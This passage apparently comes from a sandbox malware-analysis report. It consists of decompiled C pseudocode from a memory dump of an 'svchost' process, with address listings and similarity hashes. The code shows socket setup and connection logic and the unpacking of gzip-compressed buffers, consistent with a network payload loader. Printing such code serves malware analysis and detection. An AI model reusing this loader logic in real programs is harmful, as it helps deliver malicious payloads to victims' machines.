                                                                                                                                                                                                                                                    											_t272 = _t272 + 0x10;
                                                                                                                                                                                                                                                    											if(_t187 != 0) {
                                                                                                                                                                                                                                                    												_v72 = 0;
                                                                                                                                                                                                                                                    												_t191 = E04022700(_t210, _t268, _t269, _v64 + (_v84 & 0x0000ffff) + 8, _v68 - (_v84 & 0x0000ffff) + 8, 0x429fb0, 0x254, _v64 + 8, _v80,  &_v72);
                                                                                                                                                                                                                                                    												_t272 = _t272 + 0x1c;
                                                                                                                                                                                                                                                    												_v76 = _t191;
                                                                                                                                                                                                                                                    												if(_v72 != 0) {
                                                                                                                                                                                                                                                    													while(1) {
                                                                                                                                                                                                                                                    														_t229 = _v68 - (_v84 & 0x0000ffff) + 8;
                                                                                                                                                                                                                                                    														if(_v76 != _v68 - (_v84 & 0x0000ffff) + 8) {
                                                                                                                                                                                                                                                    															break;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														_t195 = E040223A0(_v72, _v76 - 4);
                                                                                                                                                                                                                                                    														_t272 = _t272 + 8;
                                                                                                                                                                                                                                                    														_v88 = _t195;
                                                                                                                                                                                                                                                    														_t229 = _v72 + _v76;
                                                                                                                                                                                                                                                    														if(_v88 !=  *((intOrPtr*)(_v72 + _v76 - 4))) {
                                                                                                                                                                                                                                                    															L41:
                                                                                                                                                                                                                                                    															if(0 != 0) {
                                                                                                                                                                                                                                                    																continue;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															L42:
                                                                                                                                                                                                                                                    															if(_v72 != 0) {
                                                                                                                                                                                                                                                    																_v124 = _v72;
                                                                                                                                                                                                                                                    																_t229 = _v124;
                                                                                                                                                                                                                                                    																E04020CC0(_v124);
                                                                                                                                                                                                                                                    																_t272 = _t272 + 4;
                                                                                                                                                                                                                                                    																_v72 = 0x666;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															if(0 != 0) {
                                                                                                                                                                                                                                                    																goto L19;
                                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                                    																goto L45;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                                    															goto L29;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														while(1) {
                                                                                                                                                                                                                                                    															L29:
                                                                                                                                                                                                                                                    															_v100 = _v72;
                                                                                                                                                                                                                                                    															_t229 = _v76 - 4;
                                                                                                                                                                                                                                                    															_v104 = _v76 - 4;
                                                                                                                                                                                                                                                    															if(( *_v100 & 0x0000ffff) != 0x8b1f) {
                                                                                                                                                                                                                                                    																break;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															_t229 = _v100 + _v104;
                                                                                                                                                                                                                                                    															_v108 =  *((intOrPtr*)(_v100 + _v104 - 4));
                                                                                                                                                                                                                                                    															if(_v108 >= 1) {
                                                                                                                                                                                                                                                    																_t201 = E04020CE0(_v108);
                                                                                                                                                                                                                                                    																_t272 = _t272 + 4;
                                                                                                                                                                                                                                                    																_v116 = _t201;
                                                                                                                                                                                                                                                    																_t229 = _v116;
                                                                                                                                                                                                                                                    																_v96 = _v116;
                                                                                                                                                                                                                                                    																if(_v96 != 0) {
                                                                                                                                                                                                                                                    																	_v92 = _v108;
                                                                                                                                                                                                                                                    																	_t229 = _v100;
                                                                                                                                                                                                                                                    																	_t204 = E0401E240(_t210, _t268, _t269, _v96,  &_v92, _v100, _v104);
                                                                                                                                                                                                                                                    																	_t272 = _t272 + 0x10;
                                                                                                                                                                                                                                                    																	if(_t204 == 0) {
                                                                                                                                                                                                                                                    																		_t205 = E04020CE0(8);
                                                                                                                                                                                                                                                    																		_t272 = _t272 + 4;
                                                                                                                                                                                                                                                    																		_v120 = _t205;
                                                                                                                                                                                                                                                    																		if(_v120 == 0) {
                                                                                                                                                                                                                                                    																			_v144 = 0;
                                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                                    																			_v144 = E0401F4E0(_v120);
                                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                                    																		_v12 = _v144;
                                                                                                                                                                                                                                                    																		E0401F9F0(_t210, _v12, _v108, _v96, _v108, 0);
                                                                                                                                                                                                                                                    																		_v37 = 1;
                                                                                                                                                                                                                                                    																		_t229 = 0;
                                                                                                                                                                                                                                                    																		if(0 != 0) {
                                                                                                                                                                                                                                                    																			continue;
                                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                                    																			goto L41;
                                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                                    																	goto L41;
                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                    																goto L41;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															goto L41;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														goto L41;
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    													goto L42;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												goto L45;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											goto L45;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										goto L45;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v36 = _v52;
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(0 != 0) {
                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L51:
                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                    						_t246 = _v8;
                                                                                                                                                                                                                                                    						_v136 = _v8;
                                                                                                                                                                                                                                                    						_v132 = _v136;
                                                                                                                                                                                                                                                    						if(_v132 == 0) {
                                                                                                                                                                                                                                                    							_v148 = 0;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_v148 = E04004EA0(_v132, 1);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v8 = 0x666;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return E04006C8C(_v12, _t210, _v20 ^ _t270, _t246, _t268, _t269);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L51;
                                                                                                                                                                                                                                                    			}























































                                                                                                                                                                                                                                                    0x04026c40
                                                                                                                                                                                                                                                    0x04026c40
                                                                                                                                                                                                                                                    0x04026c40
                                                                                                                                                                                                                                                    0x04026c50
                                                                                                                                                                                                                                                    0x04026c58
                                                                                                                                                                                                                                                    0x04026c61
                                                                                                                                                                                                                                                    0x04026c64
                                                                                                                                                                                                                                                    0x04026c6a
                                                                                                                                                                                                                                                    0x04026c6d
                                                                                                                                                                                                                                                    0x04026c76
                                                                                                                                                                                                                                                    0x04026c7b
                                                                                                                                                                                                                                                    0x04026c7e
                                                                                                                                                                                                                                                    0x04026c85
                                                                                                                                                                                                                                                    0x04026c97
                                                                                                                                                                                                                                                    0x04026c87
                                                                                                                                                                                                                                                    0x04026c8f
                                                                                                                                                                                                                                                    0x04026c8f
                                                                                                                                                                                                                                                    0x04026ca7
                                                                                                                                                                                                                                                    0x04026caa
                                                                                                                                                                                                                                                    0x04026cc1
                                                                                                                                                                                                                                                    0x04026cc8
                                                                                                                                                                                                                                                    0x04026ccd
                                                                                                                                                                                                                                                    0x04026cd4
                                                                                                                                                                                                                                                    0x04026cdb
                                                                                                                                                                                                                                                    0x04026cdf
                                                                                                                                                                                                                                                    0x04026cf1
                                                                                                                                                                                                                                                    0x04026cfd
                                                                                                                                                                                                                                                    0x04026d04
                                                                                                                                                                                                                                                    0x04026d11
                                                                                                                                                                                                                                                    0x04026d1a
                                                                                                                                                                                                                                                    0x04026d26
                                                                                                                                                                                                                                                    0x04026d2d
                                                                                                                                                                                                                                                    0x04026d3a
                                                                                                                                                                                                                                                    0x04026d41
                                                                                                                                                                                                                                                    0x04026d53
                                                                                                                                                                                                                                                    0x04026d5a
                                                                                                                                                                                                                                                    0x04026d67
                                                                                                                                                                                                                                                    0x04026d80
                                                                                                                                                                                                                                                    0x04026d85
                                                                                                                                                                                                                                                    0x04026d88
                                                                                                                                                                                                                                                    0x04026d8f
                                                                                                                                                                                                                                                    0x04026fd8
                                                                                                                                                                                                                                                    0x04026fd8
                                                                                                                                                                                                                                                    0x04026fde
                                                                                                                                                                                                                                                    0x04026fe6
                                                                                                                                                                                                                                                    0x04026fe6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026d9f
                                                                                                                                                                                                                                                    0x04026dad
                                                                                                                                                                                                                                                    0x04026db2
                                                                                                                                                                                                                                                    0x04026db5
                                                                                                                                                                                                                                                    0x04026dc0
                                                                                                                                                                                                                                                    0x04026fb9
                                                                                                                                                                                                                                                    0x04026fbd
                                                                                                                                                                                                                                                    0x04026fc2
                                                                                                                                                                                                                                                    0x04026fc9
                                                                                                                                                                                                                                                    0x04026fce
                                                                                                                                                                                                                                                    0x04026fd1
                                                                                                                                                                                                                                                    0x04026fd1
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026fbd
                                                                                                                                                                                                                                                    0x04026dcc
                                                                                                                                                                                                                                                    0x04026dd2
                                                                                                                                                                                                                                                    0x04026dd5
                                                                                                                                                                                                                                                    0x04026dd8
                                                                                                                                                                                                                                                    0x04026dd8
                                                                                                                                                                                                                                                    0x04026dde
                                                                                                                                                                                                                                                    0x04026de3
                                                                                                                                                                                                                                                    0x04026de6
                                                                                                                                                                                                                                                    0x04026df1
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026e08
                                                                                                                                                                                                                                                    0x04026e1f
                                                                                                                                                                                                                                                    0x04026e24
                                                                                                                                                                                                                                                    0x04026e29
                                                                                                                                                                                                                                                    0x04026e30
                                                                                                                                                                                                                                                    0x04026e69
                                                                                                                                                                                                                                                    0x04026e6e
                                                                                                                                                                                                                                                    0x04026e71
                                                                                                                                                                                                                                                    0x04026e78
                                                                                                                                                                                                                                                    0x04026e7f
                                                                                                                                                                                                                                                    0x04026e89
                                                                                                                                                                                                                                                    0x04026e8e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026ea0
                                                                                                                                                                                                                                                    0x04026ea5
                                                                                                                                                                                                                                                    0x04026ea8
                                                                                                                                                                                                                                                    0x04026eae
                                                                                                                                                                                                                                                    0x04026eb7
                                                                                                                                                                                                                                                    0x04026f8a
                                                                                                                                                                                                                                                    0x04026f8c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026f92
                                                                                                                                                                                                                                                    0x04026f96
                                                                                                                                                                                                                                                    0x04026f9b
                                                                                                                                                                                                                                                    0x04026f9e
                                                                                                                                                                                                                                                    0x04026fa2
                                                                                                                                                                                                                                                    0x04026fa7
                                                                                                                                                                                                                                                    0x04026faa
                                                                                                                                                                                                                                                    0x04026faa
                                                                                                                                                                                                                                                    0x04026fb3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026ebd
                                                                                                                                                                                                                                                    0x04026ebd
                                                                                                                                                                                                                                                    0x04026ec0
                                                                                                                                                                                                                                                    0x04026ec6
                                                                                                                                                                                                                                                    0x04026ec9
                                                                                                                                                                                                                                                    0x04026ed7
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026ee1
                                                                                                                                                                                                                                                    0x04026ee7
                                                                                                                                                                                                                                                    0x04026eee
                                                                                                                                                                                                                                                    0x04026ef9
                                                                                                                                                                                                                                                    0x04026efe
                                                                                                                                                                                                                                                    0x04026f01
                                                                                                                                                                                                                                                    0x04026f04
                                                                                                                                                                                                                                                    0x04026f07
                                                                                                                                                                                                                                                    0x04026f0e
                                                                                                                                                                                                                                                    0x04026f15
                                                                                                                                                                                                                                                    0x04026f1c
                                                                                                                                                                                                                                                    0x04026f28
                                                                                                                                                                                                                                                    0x04026f2d
                                                                                                                                                                                                                                                    0x04026f32
                                                                                                                                                                                                                                                    0x04026f38
                                                                                                                                                                                                                                                    0x04026f3d
                                                                                                                                                                                                                                                    0x04026f40
                                                                                                                                                                                                                                                    0x04026f47
                                                                                                                                                                                                                                                    0x04026f59
                                                                                                                                                                                                                                                    0x04026f49
                                                                                                                                                                                                                                                    0x04026f51
                                                                                                                                                                                                                                                    0x04026f51
                                                                                                                                                                                                                                                    0x04026f69
                                                                                                                                                                                                                                                    0x04026f79
                                                                                                                                                                                                                                                    0x04026f7e
                                                                                                                                                                                                                                                    0x04026f82
                                                                                                                                                                                                                                                    0x04026f84
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026f84
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026f34
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026f10
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026ef0
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026ed9
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026e90
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026e7a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026e2b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026dff
                                                                                                                                                                                                                                                    0x04026d8f
                                                                                                                                                                                                                                                    0x04026d5f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026d5f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026d2f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026d06
                                                                                                                                                                                                                                                    0x04026ff0
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04026ff6
                                                                                                                                                                                                                                                    0x04026ffa
                                                                                                                                                                                                                                                    0x04026ffc
                                                                                                                                                                                                                                                    0x04026fff
                                                                                                                                                                                                                                                    0x0402700b
                                                                                                                                                                                                                                                    0x04027012
                                                                                                                                                                                                                                                    0x04027026
                                                                                                                                                                                                                                                    0x04027014
                                                                                                                                                                                                                                                    0x0402701e
                                                                                                                                                                                                                                                    0x0402701e
                                                                                                                                                                                                                                                    0x04027030
                                                                                                                                                                                                                                                    0x04027030
                                                                                                                                                                                                                                                    0x04027047
                                                                                                                                                                                                                                                    0x04027047
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04026C8A
                                                                                                                                                                                                                                                    • codecvt.LIBCPMTD ref: 04027019
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Iterator_baseIterator_base::_codecvtstd::_
                                                                                                                                                                                                                                                    • String ID: ir\
                                                                                                                                                                                                                                                    • API String ID: 3817610042-1854106103
                                                                                                                                                                                                                                                    • Opcode ID: 013e048e50c599f190f400021c24b0a8665a3a58535e8dc2fb7aab1ea6fdaade
                                                                                                                                                                                                                                                    • Instruction ID: 71bce72721c98fd701a8830471f0d2f2c7e2f459ebc33f17165b16ca64a09b40
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 013e048e50c599f190f400021c24b0a8665a3a58535e8dc2fb7aab1ea6fdaade
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AD118B0D00228DBDF54DFE8DA94BEDBBB1BF48308F108569E405BB280E735A945DB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 18%
                                                                                                                                                                                                                                                    			E04020920(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				short _v42;
                                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                                                                    				intOrPtr _t102;
                                                                                                                                                                                                                                                    				intOrPtr _t106;
                                                                                                                                                                                                                                                    				void* _t126;
                                                                                                                                                                                                                                                    				intOrPtr _t140;
                                                                                                                                                                                                                                                    				void* _t162;
                                                                                                                                                                                                                                                    				void* _t163;
                                                                                                                                                                                                                                                    				signed int _t164;
                                                                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t163 = __esi;
                                                                                                                                                                                                                                                    				_t162 = __edi;
                                                                                                                                                                                                                                                    				_t126 = __ebx;
                                                                                                                                                                                                                                                    				_v28 =  *0x429024 ^ _t164;
                                                                                                                                                                                                                                                    				_v64 = __ecx;
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                    					_v16 = 0xffffffff;
                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                    					while(_a4 != 0 && (_a8 & 0x0000ffff) != 0) {
                                                                                                                                                                                                                                                    						_v16 =  *0x425284(2, 1, 6, 0, 0, 1);
                                                                                                                                                                                                                                                    						__eflags = _v16 - 0xffffffff;
                                                                                                                                                                                                                                                    						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                    							_v20 = 0;
                                                                                                                                                                                                                                                    							 *0x42527c(_v16, 0xffff, 0x1001,  &_v20, 4);
                                                                                                                                                                                                                                                    							E04007010(_t162,  &_v44, 0, 0x10);
                                                                                                                                                                                                                                                    							_t165 = _t165 + 0xc;
                                                                                                                                                                                                                                                    							_v44 = 2;
                                                                                                                                                                                                                                                    							_v40 = 0;
                                                                                                                                                                                                                                                    							_v42 = 0;
                                                                                                                                                                                                                                                    							_t101 =  *0x425280(_v16,  &_v44, 0x10);
                                                                                                                                                                                                                                                    							__eflags = _t101;
                                                                                                                                                                                                                                                    							if(_t101 == 0) {
                                                                                                                                                                                                                                                    								_t102 = E04020CE0(0x5c);
                                                                                                                                                                                                                                                    								_t165 = _t165 + 4;
                                                                                                                                                                                                                                                    								_v52 = _t102;
                                                                                                                                                                                                                                                    								__eflags = _v52;
                                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                                    									_v68 = 0;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v68 = E04005630(_v52, __eflags);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v12 = _v68;
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v12 + 0x34)) = 0x77777777;
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v12 + 0x54)) = 2;
                                                                                                                                                                                                                                                    								_v48 =  *0x42516c(_v16,  *((intOrPtr*)(_v64 + 8)), _v12, 0);
                                                                                                                                                                                                                                                    								_t106 = _v64;
                                                                                                                                                                                                                                                    								__eflags = _v48 -  *((intOrPtr*)(_t106 + 8));
                                                                                                                                                                                                                                                    								if(_v48 ==  *((intOrPtr*)(_t106 + 8))) {
                                                                                                                                                                                                                                                    									E04007010(_t162,  &_v44, 0, 0x10);
                                                                                                                                                                                                                                                    									_v44 = 2;
                                                                                                                                                                                                                                                    									_v40 = _a4;
                                                                                                                                                                                                                                                    									_v42 =  *0x425278(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_v12 + 0x30)) = _v64;
                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_v12 + 0x28)) = _v16;
                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_v12 + 0x2c)) = 2;
                                                                                                                                                                                                                                                    									E04006CA0(_t126, _t162, _t163, _v12 + 0x38,  &_v44);
                                                                                                                                                                                                                                                    									_t165 = _t165 + 0x18;
                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_v12 + 0x48)) = 0x10;
                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_v12 + 0x18)) =  *((intOrPtr*)(_v12 + 0x18)) + 1;
                                                                                                                                                                                                                                                    									_t140 = _v64;
                                                                                                                                                                                                                                                    									_t161 =  *((intOrPtr*)(_t140 + 0xc));
                                                                                                                                                                                                                                                    									_v24 =  *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xc))))(_v16, _v12 + 0x38,  *((intOrPtr*)(_v12 + 0x48)), 0, 0, 0, _v12, 0x10);
                                                                                                                                                                                                                                                    									__eflags = _v24;
                                                                                                                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                                                                                                                    										L17:
                                                                                                                                                                                                                                                    										_v8 = E04006410(_t126,  *((intOrPtr*)(_v64 + 4)), _t162, _t163, __eflags, _v12, 0);
                                                                                                                                                                                                                                                    										_t161 = 0;
                                                                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                                                                    										if(0 != 0) {
                                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										goto L18;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									__eflags =  *0x425274() - 0x3e5;
                                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                                    										goto L17;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                                    						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                    							 *0x42524c(_v16);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if(_v12 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                    							_v60 = _v12;
                                                                                                                                                                                                                                                    							_t161 = _v60;
                                                                                                                                                                                                                                                    							_v56 = _v60;
                                                                                                                                                                                                                                                    							if(_v56 == 0) {
                                                                                                                                                                                                                                                    								_v72 = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v72 = E04006A90(_v56, 1);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v12 = 0x666;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} while (0 != 0);
                                                                                                                                                                                                                                                    				return E04006C8C(_v8, _t126, _v28 ^ _t164, _t161, _t162, _t163);
                                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                                    0x04020920
                                                                                                                                                                                                                                                    0x04020920
                                                                                                                                                                                                                                                    0x04020920
                                                                                                                                                                                                                                                    0x0402092d
                                                                                                                                                                                                                                                    0x04020930
                                                                                                                                                                                                                                                    0x04020933
                                                                                                                                                                                                                                                    0x0402093a
                                                                                                                                                                                                                                                    0x0402093a
                                                                                                                                                                                                                                                    0x04020941
                                                                                                                                                                                                                                                    0x04020948
                                                                                                                                                                                                                                                    0x0402096d
                                                                                                                                                                                                                                                    0x04020970
                                                                                                                                                                                                                                                    0x04020974
                                                                                                                                                                                                                                                    0x0402097b
                                                                                                                                                                                                                                                    0x04020996
                                                                                                                                                                                                                                                    0x040209a4
                                                                                                                                                                                                                                                    0x040209a9
                                                                                                                                                                                                                                                    0x040209b1
                                                                                                                                                                                                                                                    0x040209b5
                                                                                                                                                                                                                                                    0x040209be
                                                                                                                                                                                                                                                    0x040209cc
                                                                                                                                                                                                                                                    0x040209d2
                                                                                                                                                                                                                                                    0x040209d4
                                                                                                                                                                                                                                                    0x040209dd
                                                                                                                                                                                                                                                    0x040209e2
                                                                                                                                                                                                                                                    0x040209e5
                                                                                                                                                                                                                                                    0x040209e8
                                                                                                                                                                                                                                                    0x040209ec
                                                                                                                                                                                                                                                    0x040209fb
                                                                                                                                                                                                                                                    0x040209ee
                                                                                                                                                                                                                                                    0x040209f6
                                                                                                                                                                                                                                                    0x040209f6
                                                                                                                                                                                                                                                    0x04020a05
                                                                                                                                                                                                                                                    0x04020a0b
                                                                                                                                                                                                                                                    0x04020a15
                                                                                                                                                                                                                                                    0x04020a33
                                                                                                                                                                                                                                                    0x04020a36
                                                                                                                                                                                                                                                    0x04020a3c
                                                                                                                                                                                                                                                    0x04020a3f
                                                                                                                                                                                                                                                    0x04020a4e
                                                                                                                                                                                                                                                    0x04020a5b
                                                                                                                                                                                                                                                    0x04020a62
                                                                                                                                                                                                                                                    0x04020a70
                                                                                                                                                                                                                                                    0x04020a7a
                                                                                                                                                                                                                                                    0x04020a83
                                                                                                                                                                                                                                                    0x04020a89
                                                                                                                                                                                                                                                    0x04020a9d
                                                                                                                                                                                                                                                    0x04020aa2
                                                                                                                                                                                                                                                    0x04020aa8
                                                                                                                                                                                                                                                    0x04020abb
                                                                                                                                                                                                                                                    0x04020ada
                                                                                                                                                                                                                                                    0x04020add
                                                                                                                                                                                                                                                    0x04020ae2
                                                                                                                                                                                                                                                    0x04020ae5
                                                                                                                                                                                                                                                    0x04020ae9
                                                                                                                                                                                                                                                    0x04020afa
                                                                                                                                                                                                                                                    0x04020b0b
                                                                                                                                                                                                                                                    0x04020b0e
                                                                                                                                                                                                                                                    0x04020b0e
                                                                                                                                                                                                                                                    0x04020b10
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04020b10
                                                                                                                                                                                                                                                    0x04020af1
                                                                                                                                                                                                                                                    0x04020af6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04020a41
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04020a3f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040209d6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04020976
                                                                                                                                                                                                                                                    0x04020b16
                                                                                                                                                                                                                                                    0x04020b1a
                                                                                                                                                                                                                                                    0x04020b20
                                                                                                                                                                                                                                                    0x04020b26
                                                                                                                                                                                                                                                    0x04020b26
                                                                                                                                                                                                                                                    0x04020b30
                                                                                                                                                                                                                                                    0x04020b3b
                                                                                                                                                                                                                                                    0x04020b3e
                                                                                                                                                                                                                                                    0x04020b41
                                                                                                                                                                                                                                                    0x04020b48
                                                                                                                                                                                                                                                    0x04020b59
                                                                                                                                                                                                                                                    0x04020b4a
                                                                                                                                                                                                                                                    0x04020b54
                                                                                                                                                                                                                                                    0x04020b54
                                                                                                                                                                                                                                                    0x04020b60
                                                                                                                                                                                                                                                    0x04020b60
                                                                                                                                                                                                                                                    0x04020b30
                                                                                                                                                                                                                                                    0x04020b67
                                                                                                                                                                                                                                                    0x04020b7f

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
